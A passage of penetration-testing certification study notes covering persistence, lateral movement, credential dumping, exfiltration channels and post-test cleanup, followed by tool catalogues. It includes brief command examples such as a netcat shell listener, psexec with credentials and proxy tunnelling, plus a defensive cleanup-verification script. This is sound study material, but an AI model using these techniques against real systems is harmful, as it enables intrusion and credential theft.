Modular: Includes modules for a variety of tasks such as privilege escalation, credential dumping, and persistence.
Red Team Operations: Designed for red team engagements and penetration testing.
Example: Running PowerShell scripts to perform privilege escalation, credential dumping, and other attacks.
PowerView
Function: Network situational awareness tool.
PowerView is a PowerShell tool developed as part of the PowerSploit framework.
It is designed for enumerating and interacting with Active Directory (AD) environments.
PowerView is particularly useful for penetration testers and red teamers who need to gather information about AD environments, identify potential attack vectors, and perform various AD-related tasks.
Features:
AD Enumeration: Collect information about AD objects such as users, groups, and computers.
Kerberos and NTLM: Exploit AD authentication mechanisms to gather information and perform attacks.
Privilege Escalation: Identify potential privilege escalation paths and gather information for further exploitation.
LDAP Queries: Perform advanced LDAP queries to extract information from AD.
Domain Trusts: Discover and enumerate domain trusts to understand the AD forest structure.
Use Case: Automating the discovery and enumeration of Active Directory (AD) environments.
Example: Mapping out AD environments to identify high-value targets and potential attack paths.
PowerUpSQL
Function: SQL Server post-exploitation toolkit.
PowerUpSQL is a PowerShell tool designed to assess and exploit SQL Server instances.
It is used to identify and exploit vulnerabilities in SQL Server installations, primarily focusing on security assessments and privilege escalation.
PowerUpSQL is a valuable tool for penetration testers and red teamers who need to interact with SQL Server environments.
Features:
SQL Server Enumeration: Discover SQL Server instances, databases, and associated configurations.
Privilege Escalation: Identify potential privilege escalation paths and misconfigurations in SQL Server.
Exploit Vulnerabilities: Exploit known vulnerabilities and misconfigurations in SQL Server installations.
Configuration Checks: Check for common SQL Server misconfigurations that could be exploited.
Use Case: Automating SQL Server attacks.
Example: Identifying misconfigurations and vulnerabilities in SQL Server instances.
AD search
Function: Active Directory search and enumeration.
Active Directory (AD) Search refers to the process of querying and retrieving information from an Active Directory environment.
This can involve searching for objects such as users, groups, computers, and other entities within the AD domain.
Various tools and techniques can be used for AD search, ranging from built-in Windows utilities to specialized PowerShell scripts and third-party tools.
Use Case: Automating the search for AD objects and attributes.
Example: Extracting user and group information from AD to facilitate privilege escalation.
Bash
Input/Output Management
Function: Handling input and output streams.
Use Case: Automating tasks that involve reading from or writing to files and devices.
Example: Writing scripts to automate data extraction and manipulation tasks.
Data Manipulation
Function: Transforming and processing data.
Use Case: Automating data cleaning, filtering, and transformation.
Example: Parsing and reformatting log files for further analysis or feeding into other tools.
Python
Impacket
Function: Collection of Python classes for working with network protocols.
Use Case: Automating network attacks and post-exploitation tasks.
Example: Writing scripts to perform SMB relay attacks, NTLM relay attacks, and other network-based attacks.
Scapy
Function: Network packet manipulation tool.
Use Case: Automating the creation, manipulation, and analysis of network packets.
Example: Writing scripts to perform custom network attacks and reconnaissance.
Breach and Attack Simulation (BAS)
Caldera
Function: Automated adversary emulation platform.
Caldera is an open-source automated adversary emulation and red teaming platform developed by MITRE.
It is designed to automate the process of simulating sophisticated adversarial tactics, techniques, and procedures (TTPs) within an organization's network.
Caldera provides a way to test and validate security defenses by simulating real-world attacks and is often used in security assessments, red teaming, and adversary emulation exercises.
Features:
Automated Adversary Emulation: Simulates adversary behavior by automating attack scenarios based on the MITRE ATT&CK framework.
Customizable Scenarios: Allows users to create and customize attack scenarios to fit specific security assessment needs.
Modular Architecture: Includes various modules for different attack techniques, enabling flexible and extensible simulations.
Interactive Dashboard: Provides an interface for managing and monitoring simulations, tracking progress, and analyzing results.
Use Case: Simulating advanced persistent threat (APT) behaviors.
Example: Running automated attack scenarios to test defenses and identify weaknesses.
Usage → python3 caldera.py
Infection Monkey
Function: Open-source breach and attack simulation tool.
Infection Monkey is an open-source network security assessment tool developed by Guardicore (now part of Akamai).
It is designed to simulate a malware infection and analyze how well an organization's network security controls can detect and respond to such infections.
The tool focuses on mapping network vulnerabilities and assessing how an infection spreads through the network, helping organizations identify weaknesses and improve their defenses.
Features:
Network Mapping: Visualizes the network topology and identifies potential vulnerabilities and attack paths.
Simulated Malware Spread: Simulates how malware would spread through the network, allowing you to observe the effectiveness of security controls.
Customizable Attack Scenarios: Offers options to customize the attack scenarios and configure the simulated malware behavior.
Interactive Dashboard: Provides a web-based interface for monitoring and managing simulations, visualizing results, and analyzing network security posture.
Use Case: Simulating various attack techniques and paths.
Example: Automating the infection and lateral movement within a network to test security controls.
Atomic Red Team
Function: Library of tests mapped to the MITRE ATT&CK framework.
Atomic Red Team is an open-source project developed by Red Canary, designed to provide a collection of small, atomic tests that simulate real-world adversary behaviors.
These tests are used to evaluate the effectiveness of security controls and detection capabilities against tactics, techniques, and procedures (TTPs) commonly used by attackers, based on the MITRE ATT&CK framework.
Features:
Atomic Tests: Provides a library of simple, focused tests that simulate specific adversary behaviors.
MITRE ATT&CK Mapping: Each test is mapped to MITRE ATT&CK techniques, helping to assess detection and response capabilities.
Modular and Customizable: Tests are designed to be easy to execute and customize, allowing users to adapt them to their specific environments.
Integration: Supports integration with various security tools and platforms for automated testing and analysis.
Use Case: Automating the execution of specific attack techniques.
Example: Running individual tests to verify the effectiveness of security controls against specific attack techniques.
Chapter 5
Objective 5.1
Scheduled Tasks/Cron Jobs
Function: Automating tasks to run at specified times.
Use Case: Setting up periodic execution of malicious scripts or commands.
Example: Creating a cron job to regularly execute a script that maintains a backdoor connection.
Service Creation
Function: Creating system services that run with elevated privileges.
Use Case: Establishing persistence by installing malicious services.
Example: Creating a Windows service that launches a reverse shell upon system startup.
Reverse Shell
Function: Gaining remote access to a target system.
Use Case: Maintaining control over the target by initiating a connection from the target to the attacker.
Example: Using a reverse shell to connect back to the attacker's machine and issue commands.
Bind Shell
Function: Opening a port on the target system for remote access.
Use Case: Allowing the attacker to connect to the target system at any time.
Example: Setting up a bind shell that listens for incoming connections on a specific port.
Add New Accounts
Function: Creating new user accounts with administrative privileges.
Use Case: Ensuring persistent access by adding new accounts to the system.
Example: Adding a new user with administrative rights to the local user database.
Obtain Valid Account Credentials
Function: Acquiring legitimate user credentials.
Use Case: Using valid credentials to maintain access without raising suspicion.
Example: Dumping password hashes and cracking them to gain valid login information.
Registry Keys
Function: Modifying system settings via the registry.
Use Case: Configuring persistence mechanisms that run at startup.
Example: Adding a registry key to execute a script upon user login.
Command and Control (C2) Frameworks
Function: Managing compromised systems from a central location.
Use Case: Coordinating attacks and maintaining persistence across multiple targets.
Example: Using C2 frameworks like Cobalt Strike or Metasploit to issue commands and gather information.
Backdoor
Web Shell
Function: Executing commands on a web server through a web interface.
Use Case: Maintaining access to a compromised web server.
Example: Uploading a PHP web shell to execute commands and navigate the file system.
Trojan
Function: Disguising malicious software as legitimate applications.
Use Case: Establishing persistence by running hidden malicious processes.
Example: Delivering a Trojan horse that provides remote access while appearing benign.
Rootkit
Function: Hiding the presence of malicious processes and files.
Use Case: Maintaining stealthy access to a compromised system.
Example: Installing a rootkit to intercept and alter system calls, hiding the attacker's activities.
Browser Extensions
Function: Extending browser functionality with malicious intent.
Use Case: Maintaining persistence through a compromised browser.
Example: Installing a malicious browser extension that captures credentials and sends them to the attacker.
Tampering Security Controls
Function: Disabling or altering security mechanisms.
Use Case: Ensuring that persistence mechanisms remain undetected.
Example: Disabling antivirus programs or modifying firewall rules to avoid detection.
Objective 5.2
Pivoting
Function: Using a compromised system to access other systems in the network.
Use Case: Expanding the reach within the target environment.
Example: Compromising a workstation and using it to access a restricted server.
Relay Creation
Function: Setting up relays to route traffic through compromised hosts.
Use Case: Obfuscating the attacker's true location and maintaining stealth.
Example: Using an SSH relay to tunnel traffic through a compromised machine.
Enumeration
Service Discovery
Function: Identifying services running on hosts.
Use Case: Finding targets and attack vectors.
Example: Using Nmap to list open ports and services.
Network Traffic Discovery
Function: Monitoring and analyzing network traffic.
Use Case: Identifying active hosts and services.
Example: Using Wireshark to capture and analyze network packets.
Additional Credential Capture
Function: Gathering more credentials from compromised systems.
Use Case: Escalating privileges and moving laterally.
Example: Using Mimikatz to extract passwords from memory.
Credential Dumping
Function: Extracting credentials from memory, files, or other locations.
Use Case: Using these credentials to access other systems.
Example: Dumping NTLM hashes from a Windows machine.
String Searches
Function: Searching for sensitive information in files.
Use Case: Finding passwords, keys, or other useful data.
Example: Using grep to search for "password" in configuration files.
Service Discovery
SMB/Fileshares
Function: Identifying and accessing shared files.
Use Case: Finding sensitive data or further access points.
Example: Enumerating SMB shares with smbclient.
RDP/VNC
Function: Identifying remote desktop services.
Use Case: Gaining graphical access to systems.
Example: Scanning for open RDP ports with Nmap.
SSH
Function: Identifying SSH services.
Use Case: Securely accessing remote systems.
Example: Scanning for SSH services and attempting login with credentials.
Cleartext Protocols
Function: Identifying protocols that transmit data in cleartext.
Use Case: Intercepting sensitive information.
Example: Capturing Telnet traffic with a packet sniffer.
LDAP
Function: Identifying directory services.
Use Case: Extracting user and network information.
Example: Using ldapsearch to query an LDAP directory.
FTP
Function: Identifying file transfer protocol services.
Use Case: Transferring files to/from the target.
Example: Connecting to FTP servers with anonymous access.
Telnet
Function: Identifying Telnet services.
Use Case: Gaining remote command-line access.
Example: Logging into Telnet services with cleartext credentials.
HTTP/HTTPS
Function: Identifying web services.
Use Case: Exploiting web applications and interfaces.
Example: Enumerating web servers and discovering web interfaces with Burp Suite.
LPD
Function: Identifying line printer daemon services.
Use Case: Exploiting printer services.
Example: Scanning for LPD services with Nmap.
JetDirect
Function: Identifying printer services.
Use Case: Exploiting printer services.
Example: Enumerating JetDirect printers.
RPC/DCOM
Function: Identifying RPC and DCOM services.
Use Case: Executing commands on remote systems.
Example: Using rpcclient to enumerate RPC services.
Process IDs
Function: Identifying running processes.
Use Case: Finding processes to exploit or terminate.
Example: Using tasklist on Windows to list process IDs.
Windows Management Instrumentation (WMI)
Function: Managing and querying system information on Windows.
Use Case: Executing commands and gathering information.
Example: Using WMI to run scripts and commands on remote systems.
Windows Remote Management (WinRM)
Function: Remotely managing Windows systems.
Use Case: Executing commands and managing systems remotely.
Example: Using PowerShell Remoting to manage Windows systems.
Tools
Living Off the Land Binaries (LOLBins)
Netstat
Function: Displays network connections and listening ports.
Use Case: Identifying active connections on the system.
Example: netstat -an to list all active connections and listening ports.
Net Commands
Function: Manages network resources, users, and services.
Use Case: Administering network shares, user accounts, and services.
Example: net user to list user accounts.
cmd.exe
Function: Windows command prompt.
Use Case: Executing commands and scripts.
Example: Running batch files or individual commands.
explorer.exe
Function: Windows graphical user interface.
Use Case: Browsing files and directories.
Example: explorer.exe to open the file explorer.
ftp.exe
Function: File Transfer Protocol client.
Use Case: Transferring files to/from remote servers.
Example: ftp.exe <server> to connect to an FTP server.
mmc.exe
Function: Microsoft Management Console.
Use Case: Managing Windows administrative tools.
Example: mmc.exe to open the management console.
rundll
Function: Runs functions exported from DLLs.
Use Case: Executing DLL functions.
Example: rundll32.exe <dllname>,<entrypoint> to execute a function.
msbuild
Function: Builds .NET applications.
Use Case: Compiling and executing code.
Example: msbuild <project>.proj to build a .NET project.
route
Function: Displays and modifies the routing table.
Use Case: Managing network routes.
Example: route print to display the routing table.
strings/findstr.exe
Function: Searches for text strings in files.
Use Case: Finding specific text in files.
Example: findstr <text> <filename> to search for text within a file.
Covenant
Function: Command and control framework.
Covenant is an open-source, .NET-based Command and Control (C2) framework designed for red teaming and penetration testing.
It allows security professionals to simulate advanced attacks, manage compromised hosts, and conduct post-exploitation activities in a controlled manner.
Covenant supports a variety of attack techniques and provides an interactive web-based interface for managing and orchestrating operations.
Use Case: Managing compromised systems and executing commands remotely.
Example: Using Covenant to execute PowerShell scripts on compromised hosts.
CrackMapExec
Function: Post-exploitation tool for managing Windows networks.
Use Case: Automating various tasks such as credential validation and command execution.
Example: Using CrackMapExec to enumerate users and shares.
Impacket
Function: Collection of Python classes for working with network protocols.
Use Case: Scripting and automating network tasks.
Example: Using psexec.py from Impacket to execute commands on remote systems.
Netcat
Function: Network utility for reading and writing data across network connections.
Use Case: Creating reverse or bind shells.
Example: nc -lvp <port> to start a listener.
sshuttle
Function: Transparent proxy server that works as a poor man's VPN.
sshuttle is an open-source tool that provides a simple way to create a VPN-like connection over SSH.
It allows users to forward all traffic from their local machine through an SSH tunnel to a remote server, effectively allowing access to remote networks as if they were directly connected to them.
It's particularly useful for bypassing network restrictions and accessing internal resources securely.
Features:
Transparent Proxy: Routes traffic from your local machine through an SSH tunnel, making it appear as if you're on the remote network.
No Root Required: Operates without needing root privileges on the local machine.
Supports IPv4 and IPv6: Handles both IPv4 and IPv6 traffic.
Simple Setup: Easy to configure and use with minimal setup required.
Use Case: Tunneling traffic through a compromised host.
Example: sshuttle -r user@host 0.0.0.0/0 to tunnel all traffic through an SSH connection.
Usage → sshuttle -r <user@remote_host> <network>
Proxychains
Function: Forces any TCP connection made by any application to go through a proxy such as Tor or any other SOCKS4, SOCKS5 or HTTP(S) proxy.
Proxychains is a Linux utility that allows you to force any TCP connection made by any given application to go through a proxy (such as SOCKS or HTTP proxies).
It is especially useful for network penetration testing, privacy, and anonymizing traffic.
Proxychains works by intercepting network calls and redirecting them through specified proxy servers.
Features:
Support for Multiple Proxy Types: Supports SOCKS5, SOCKS4, and HTTP proxies.
Flexible Proxy Chain: Allows chaining multiple proxies to enhance anonymity.
Application Transparency: Routes traffic for any application without requiring modifications to the application itself.
Configuration File: Provides a configuration file where proxies and options are defined.
Use Case: Obfuscating traffic through multiple proxies.
Example: proxychains nmap -sT <target> to run Nmap through proxies.
PowerShell Integrated Scripting Environment (ISE)
Function: Development environment for PowerShell scripts.
PowerShell Integrated Scripting Environment (ISE) is a Microsoft development tool that provides a rich graphical interface for creating, testing, and debugging PowerShell scripts.
It is an integrated environment that enhances the scripting and automation capabilities of PowerShell by offering features like syntax highlighting, IntelliSense, and debugging tools.
Although PowerShell ISE has been deprecated in favor of Visual Studio Code with the PowerShell extension, it is still used in various environments.
Features:
Script Editor: Provides a text editor for writing and editing PowerShell scripts with syntax highlighting.
IntelliSense: Offers auto-completion for commands, parameters, and variables, improving script accuracy and efficiency.
Script Debugger: Includes tools for debugging scripts, such as breakpoints, variable inspection, and step execution.
Integrated Console: Allows you to run and test PowerShell commands interactively within the ISE.
Command Add-ons: Supports custom add-ons and modules to extend functionality.
Use Case: Writing and debugging PowerShell scripts.
Example: Using PowerShell ISE to develop and test scripts for enumeration and exploitation.
Usage: Launch → powershell_ise
Batch Files
Function: Scripts that execute a series of commands in Windows.
Batch files are scripts containing a sequence of commands to be executed by the command-line interpreter (CMD.EXE) on Windows operating systems.
They automate repetitive tasks, manage system configurations, and execute commands in a batch process.
Batch files use a simple scripting language that includes basic programming constructs like loops, conditionals, and variables.
Features:
Command Automation: Automates sequences of command-line operations.
System Configuration: Used for setting environment variables, managing files, and configuring system settings.
Simple Scripting: Employs a straightforward scripting language with basic programming capabilities.
File Extension: Typically saved with the .bat or .cmd file extension.
Use Case: Automating tasks and command sequences.
Example: Creating a batch file to automate network scans.
Metasploit
Function: Penetration testing framework.
Use Case: Exploiting vulnerabilities and managing post-exploitation activities.
Example: Using Metasploit modules to exploit known vulnerabilities and establish sessions.
PsExec
Function: Executes processes on remote systems.
PsExec is a command-line tool from Microsoft’s Sysinternals suite that allows users to execute processes on remote systems and interact with them as if they were running locally.
It can be used for various administrative tasks such as running scripts, installing applications, and managing processes on remote machines.
PsExec is often employed in system administration, troubleshooting, and penetration testing.
Features:
Remote Execution: Run commands and processes on remote systems.
Interactive Session: Launch interactive sessions on remote machines.
Service Management: Start and stop services on remote systems.
File Execution: Execute applications and scripts remotely.
Use Case: Running commands and scripts remotely.
Example: psexec \\<remote_host> -u <user> -p <password> cmd to open a command prompt on a remote machine.
Mimikatz
Function: Post-exploitation tool for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory.
Mimikatz is an open-source tool developed by Benjamin Delpy that is used for extracting and manipulating authentication credentials from Windows systems.
It is widely used in penetration testing and security research to demonstrate and exploit vulnerabilities related to Windows authentication mechanisms.
Mimikatz can extract plaintext passwords, hash values, and Kerberos tickets, and perform various attacks on Windows authentication protocols.
Use Case: Credential dumping and privilege escalation.
Example: Using Mimikatz to dump Windows password hashes from memory.
Objective 5.3
File Encryption and Compression
Purpose: Protect and reduce the size of files for easier and more secure transfer.
Examples:
Encryption: Using tools like GPG to encrypt files before exfiltration.
Compression: Using ZIP or RAR to compress files, often with added password protection for security.
Covert Channels
Steganography: Hiding data within other non-suspicious data.
Example: Embedding sensitive data in image or audio files.
DNS: Using DNS queries and responses to exfiltrate data.
Example: Encoding data into DNS queries that get sent to an attacker-controlled DNS server.
Internet Control Message Protocol (ICMP): Using ICMP packets (commonly used for ping) to exfiltrate data.
Example: Sending data within ICMP Echo Request and Reply packets.
HTTPS: Encrypting data within HTTPS traffic to avoid detection.
Example: Sending encrypted data through HTTPS to a remote server controlled by the attacker.
Email
Purpose: Sending data as attachments or within the body of emails.
Example: Using a compromised email account to send sensitive files to an external email address.
Cross-Account Resources
Purpose: Using access to multiple accounts or systems to stage and move data.
Example: Moving data between different cloud accounts or using multiple compromised user accounts to exfiltrate data gradually.
Cloud Storage
Purpose: Uploading data to cloud storage services for later retrieval.
Examples:
Google Drive, Dropbox, AWS S3: Uploading sensitive files to these services using compromised credentials.
Alternate Data Streams (ADS)
Purpose: Hiding data within NTFS file system streams.
Example: Storing data in an alternate data stream of a legitimate file to avoid detection.
Text Storage Sites
Purpose: Using public paste sites to exfiltrate data.
Examples:
Pastebin, Ghostbin: Posting data to these sites, often in a format that seems harmless or encoded.
Virtual Drive Mounting
Purpose: Mounting remote or virtual drives to store and access data.
Example: Using tools to mount a virtual drive on a compromised system and copying sensitive data to it for later access.
Objective 5.4
Remove Persistence Mechanisms
Objective: Ensure that no backdoors, rootkits, or other persistent threats remain on the system.
Examples:
Deleting scheduled tasks or cron jobs created by the penetration tester.
Removing malicious registry keys or startup entries.
Revert Configuration Changes
Objective: Restore the system to its pre-test state, reversing any changes made during the penetration test.
Examples:
Undoing modifications to system configurations or security settings.
Reverting altered firewall rules or access control lists (ACLs).
Remove Tester-Created Credentials
Objective: Eliminate any user accounts or credentials created during the penetration test.
Examples:
Deleting any test accounts or passwords added during the engagement.
Ensuring all test accounts are fully removed and cannot be used later.
Remove Tools
Objective: Clean up all tools and scripts used during the penetration test to leave no trace.
Examples:
Deleting all binaries, scripts, and files associated with penetration testing tools like Metasploit, Nmap, or custom scripts.
Ensuring no temporary files or logs related to the tools remain on the system.
Spin Down Infrastructure
Objective: Decommission any temporary infrastructure set up for the penetration test.
Examples:
Terminating cloud instances, virtual machines, or containers used during the test.
Ensuring all temporary network configurations are reverted.
Preserve Artifacts
Objective: Keep necessary logs, data, and evidence for reporting and auditing purposes while ensuring no sensitive data remains exposed.
Examples:
Archiving relevant logs, screenshots, and data used to document findings and support the final report.
Ensuring these artifacts are securely stored and only accessible to authorized personnel.
Secure Data Destruction
Objective: Ensure that any sensitive data collected during the penetration test is securely destroyed to prevent unauthorized access.
Examples:
Using secure deletion tools to wipe sensitive files or data.
Following best practices for data destruction, such as overwriting data multiple times or using encryption before deletion.
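The cleanup steps above, as an added PowerShell example that is not part of the original notes: it takes the artifact names a tester recorded in the engagement log (every name below is a constructed placeholder) and confirms that each scheduled task, service, local account, Run key value and dropped file is gone before the engagement is closed.

```powershell
# Added example, not from the original notes. Verifies that the persistence
# artifacts recorded during the test have been removed. All names are
# constructed placeholders; replace them with the entries from the engagement log.
$Artifacts = @{
    ScheduledTasks = @('PT-Beacon')                        # placeholder task name
    Services       = @('PTHelperSvc')                      # placeholder service name
    LocalUsers     = @('pt_svc')                           # placeholder tester account
    RunKeyValues   = @('PTUpdater')                        # placeholder Run value name
    Files          = @('C:\Windows\Temp\pt_tool.exe')      # placeholder dropped file
}

$Leftovers = @()

# Scheduled tasks (Objective 5.1 "Scheduled Tasks/Cron Jobs")
foreach ($t in $Artifacts.ScheduledTasks) {
    if (Get-ScheduledTask -TaskName $t -ErrorAction SilentlyContinue) {
        $Leftovers += "ScheduledTask: $t"
    }
}

# Services (Objective 5.1 "Service Creation")
foreach ($s in $Artifacts.Services) {
    if (Get-Service -Name $s -ErrorAction SilentlyContinue) {
        $Leftovers += "Service: $s"
    }
}

# Tester-created local accounts (Objective 5.4 "Remove Tester-Created Credentials")
foreach ($u in $Artifacts.LocalUsers) {
    if (Get-LocalUser -Name $u -ErrorAction SilentlyContinue) {
        $Leftovers += "LocalUser: $u"
    }
}

# Run key values in both the machine and current-user hives (Objective 5.1 "Registry Keys")
$RunKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
foreach ($k in $RunKeys) {
    $props = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
    foreach ($v in $Artifacts.RunKeyValues) {
        if ($props -and ($props.PSObject.Properties.Name -contains $v)) {
            $Leftovers += "RunKey: $k\$v"
        }
    }
}

# Dropped tool binaries and scripts (Objective 5.4 "Remove Tools")
foreach ($f in $Artifacts.Files) {
    if (Test-Path -LiteralPath $f) {
        $Leftovers += "File: $f"
    }
}

if ($Leftovers.Count -eq 0) {
    "Cleanup verified on $env:COMPUTERNAME: no recorded artifacts remain."
} else {
    "Leftover artifacts on $env:COMPUTERNAME:"
    $Leftovers
}
```

Run it from the tester's own workstation with Invoke-Command -ComputerName <host> -FilePath so the script itself is never copied onto the target, and keep its output with the preserved engagement artifacts.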
Tools
Reconnaissance
WHOIS → Tools to gather information from public records about domain ownership.
Nslookup → Tools to help identify the IP addresses associated with an organization.
theHarvester → Scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization.
Recon-ng → A modular web reconnaissance framework that organizes and manages OSINT work.
Censys → A web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.
FOCA (Fingerprinting Organizations with Collected Archives) → An open source tool used to find metadata within Office documents, PDFs, and other common file formats.
Shodan → A specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.
Maltego → A commercial product that assists with the visualization of data gathered from OSINT efforts.
Vulnerability Scanners
Nessus → A commercial vulnerability scanning tool used to scan a wide variety of devices.
OpenVAS → An open source alternative to commercial tools such as Nessus. OpenVAS also performs network vulnerability scans.
Sqlmap → An open source tool used to automate SQL injection attacks against web applications with database back ends.
Nikto, Wapiti, and W3AF → Open source web application vulnerability scanners.
WPScan → A web application testing tool designed to work with websites running the WordPress content management system.
Security Content Automation Protocol (SCAP) → A set of tools designed to help organizations manage compliance with security standards.
Social Engineering
The Social Engineer Toolkit (SET) → Provides a framework for automating the social engineering process, including sending spear phishing messages, hosting fake websites, and collecting credentials.
Browser Exploitation Framework (BeEF) → Provides an automated toolkit for using social engineering to take over a victim’s web browser.
Credential Testing Tools
Hashcat, John the Ripper, Hydra, Medusa, Patator, and Cain → Password-cracking tools used to reverse-engineer hashed passwords stored in files.
CeWL → A custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.
Mimikatz → Retrieves sensitive credential information from memory on Windows systems.
DirBuster → A brute-forcing tool used to enumerate files and directories on a web server.
Debuggers and Software Testing Tools
Immunity Debugger → Designed specifically to support penetration testing and the reverse engineering of malware.
GDB → A widely used open source debugger for Linux that works with a variety of programming languages.
OllyDbg → A Windows debugger that works on binary code at the assembly language level.
WinDbg → Another Windows-specific debugging tool that was created by Microsoft.
IDA → A commercial debugging tool that works on Windows, Mac, and Linux platforms.
Brakeman → A static software analysis tool used for scanning Ruby on Rails applications.
Covenant → A software security testing tool used for testing .NET applications.
TruffleHog → A tool that scans through code repositories for accidentally published secrets.
Network Testing
Wireshark → A protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic.
Hping → A command-line tool that allows testers to artificially generate network traffic.
Rogue wireless access points → Used to attract connections from unsuspecting users.
EAPHammer → Used to conduct evil twin attacks against WPA2-Enterprise wireless networks.
Reaver → Used to conduct attacks against networks that support Wi-Fi Protected Setup (WPS).
Spooftooph → Used to perform attacks against Bluetooth-enabled devices.
The Wireless Geographic Logging Engine (WiGLE) → An open database of wireless network information collected by the community and published for open access.
Online SSL checkers → Used to determine whether websites are susceptible to SSL and/or TLS vulnerabilities.
Remote Access
Secure Shell (SSH) → Provides secure encrypted connections between systems.
Ncat and Netcat → Provide an easy way to read and write data over network connections.
Proxychains → Allows testers to force connections through a proxy server where they may be inspected and altered before being passed on to their final destination.
Exploitation
Metasploit → The most popular exploitation framework and supports thousands of plugins covering different exploits.
SearchSploit → A command-line tool that allows you to search through a database of known exploits.
PowerSploit and Empire → Windows-centric sets of PowerShell scripts that may be used to automate penetration testing tasks.
Responder → A toolkit used to answer NetBIOS queries from Windows systems on a network.
Impacket → A set of network tools that provide low-level access to network protocols.
Mitm6 → A tool used to conduct attacks against IPv6 networks.
CrackMapExec → A set of tools used after gaining access to a network to assess the security of an Active Directory environment.
Steganography
Open Steg and Steghide → General-purpose steganography tools used to hide text within images and other binary files.
Coagula → Used to embed text within audio files.
Sonic Visualiser → An audio analysis tool that may be used to detect alterations made by steganography tools.
Snow → Uses whitespace and tabs within a document to hide information.
TinEye → A reverse image search tool that allows security researchers to identify the original image when they suspect steganography is being used.
Metagoofil → Used to extract metadata from a large variety of file types.
Cloud Tools
ScoutSuite → A cloud security auditing tool that can work across commonly used cloud environments.
CloudBrute → A scanner used to identify the cloud components used by an organization.
Pacu → A cloud exploitation framework focused on Amazon Web Services (AWS)-hosted environments.
Cloud Custodian → A rule enforcement engine that allows the consistent application of security policies across cloud environments.